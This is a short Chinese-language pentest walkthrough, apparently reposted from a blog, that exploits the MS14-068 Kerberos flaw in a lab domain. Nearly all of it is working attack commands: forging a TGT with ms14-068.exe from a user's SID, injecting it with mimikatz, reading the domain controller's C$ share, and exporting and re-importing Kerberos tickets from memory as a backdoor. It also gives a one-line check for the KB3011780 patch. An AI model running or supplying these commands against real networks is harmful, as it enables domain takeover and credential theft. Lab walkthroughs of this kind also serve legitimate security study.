标签:渗透 068 top yuyonghu01 mimikatz MS14 klist pentest TOP
1、生成TGT:
net config workstation
ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top
生成的票据:
2、注入TGT:
先查看自己的klist 如果有的话 那么先清理掉 否则可能会导致无法成功
klist
清理原来的票据:klist purge
清除票据的原因:https://www.t00ls.net/viewthread.php?tid=28727
利用mimikatz进行注入
非交互式中直接执行一句话
mimikatz.exe "kerberos::ptc TGT_yuyonghu01@top.pentest.top.ccache" exit
注入成功!
查看票据:
klist
尝试访问域服务器,这里需要注意的不能用ip访问,因为是通过协议来进行认证的
dir \\WIN-CKT0M35R6UO.top.pentest.top\c$
漏洞:MS14-068 补丁编号kb3011780
查看是否打补丁:systeminfo |find "3011780"
后门Export the ticket:
再导入票据之前先清除下票据,以防止之前实验的因素的干扰
klist purge
通过mimikatz导出内存中的Ticket,执行:
sekurlsa::tickets /export
如图:
挑选其中的[0;7d8508]-2-0-60a00000-yuyonghu01@krbtgt-TOP.PENTEST.TOP.kribi
在域普通用户的主机进行导入
导入:
mimikatz "kerberos::ptt [0;7d8508]-2-0-60a00000-yuyonghu01@krbtgt-TOP.PENTEST.TOP.kirbi"
尝试访问域控服务器:
dir \\WIN-CKT0M35R6UO.top.pentest.top\c$
标签:渗透,068,top,yuyonghu01,mimikatz,MS14,klist,pentest,TOP 来源: https://www.cnblogs.com/zpchcbd/p/12114835.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。